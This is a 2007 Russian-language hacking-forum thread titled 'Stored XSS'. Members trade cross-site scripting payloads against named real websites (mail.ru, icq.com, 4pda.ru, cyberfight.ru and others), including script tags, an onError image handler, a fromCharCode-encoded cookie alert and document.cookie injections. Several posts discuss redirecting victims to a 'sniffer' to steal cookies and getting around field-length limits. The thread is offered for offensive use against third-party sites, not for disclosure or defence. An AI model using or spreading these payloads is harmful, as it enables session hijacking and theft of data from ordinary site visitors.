Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс.

    Пример запроса в поле:

     
    2 people like this.
  2. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    234
    Likes Received:
    433
    Reputations:
    287
    Code:
    http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F
    Оставляем комментарий такого вида:
    Code:
    "><script>alert('xss')</script>
     
  3. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

    Пример запроса:


    Пример можно посмотреть здесь:

    PS. Не должны быть указаны страна и часовой пояс.
     
    #83 XenOtai, 4 Sep 2007
    Last edited: 4 Sep 2007
    3 people like this.
  4. AdReNa1!Ne

    AdReNa1!Ne Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    176
    Likes Received:
    105
    Reputations:
    14
    http://robotraff.com/userpanel/selltraff.php
    Уязвимы все поля

    Результат - http://robotraff.com/userpanel/stats.php?thread=136
     
  5. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    188
    Likes Received:
    161
    Reputations:
    24
    http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0&cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29%3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cat=0&x=0&y=0

    http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
     
    1 person likes this.
  6. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    31
    Likes Received:
    49
    Reputations:
    3
    Активная XSS на infostore.org
    На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
    .........................................................................
    Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:"
    при добавлении новости пользователем, и в личных сообщениях.
    В поле "текст:" пишем следующие:
    Code:
    <img src="a"onError=javascript:alert('XSS');>
    Также, еще была найдена пассивная XSS
    Code:
    <a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a>
    .........................................................................
    ______________________________________________
    *****************************************
     
    2 people like this.
  7. F1anKeR

    F1anKeR New Member

    Joined:
    24 Sep 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
     
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте
     
  9. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    icq.com

    все прошлые прикрыли, но:
    опять в блоге, и опять уязвимо поле "Image web address:"
    "onmouseover="alert('xss')"
    все символы не фильтруются и кол-во не ограниченно
     
    3 people like this.
  10. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    Где находится это поле "Image web address:"?
     
  11. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    И на рамблере тоже не работает...:(
     
    1 person likes this.
  12. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    работает, в ие по крайней мере точно.

    http://img30.picoodle.com/img/img30/6/10/21/f_1013m_424a366.jpg
     
    1 person likes this.
  13. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    Слушай у меня не работает, может я чё не так делаю? Не мог бы ты пободробней объяснить?
     
  14. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    735
    Likes Received:
    630
    Reputations:
    -3
    cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
    пример:
    при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.
     
    1 person likes this.
  15. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    215
    Likes Received:
    141
    Reputations:
    12
    Добавлю, что там еще пассивная ХСС c куками. Уж0с

    Code:
    http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Search.x=0&Search.y=0
     
  16. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    735
    Likes Received:
    630
    Reputations:
    -3
    пассивные я тоже находил, но эта тема называется активные xss ;)
     
  17. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    735
    Likes Received:
    630
    Reputations:
    -3
    http://livechat.boldchat.com/aid/6278237534205176796/bc.chat
    active XSS в поле your name
     
  18. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    408
    Likes Received:
    227
    Reputations:
    42
    Paradox Security Systems

    Code:
    http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E


    edit:



    Blogus.ru

    Code:
    http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E


    edit:


    Moto.ru


    Code:
    http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E
     
    #98 Fugitif, 27 Oct 2007
    Last edited: 27 Oct 2007
  19. Dreel

    Dreel New Member

    Joined:
    23 Aug 2007
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    Fugitif, и где там активность????
    _http://job.properm.ru/
    _http://auto.properm.ru/
    Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
    Code:
    Иванов Иван <script>alert(/ xss /)</script>
    Заходим на сайт _http://www.virtualflowers.ru/abook.php
    Добавить адресата - в каментах
    Code:
    <script>alert(/ GraBBerZ.com /)</script>
     
    1 person likes this.
  20. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    mail.ru

    в блогах пишем сообщение, там можно использовать разные теги, например имейдж

    <img src="адрес_снифера">

    так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее.


    зы пользуясь случаем хочу передать привет админам мейла.
     
    3 people like this.
Loading...
Similar Threads - Хранимые
  1. 4upakabr0
    Replies:
    3
    Views:
    1,776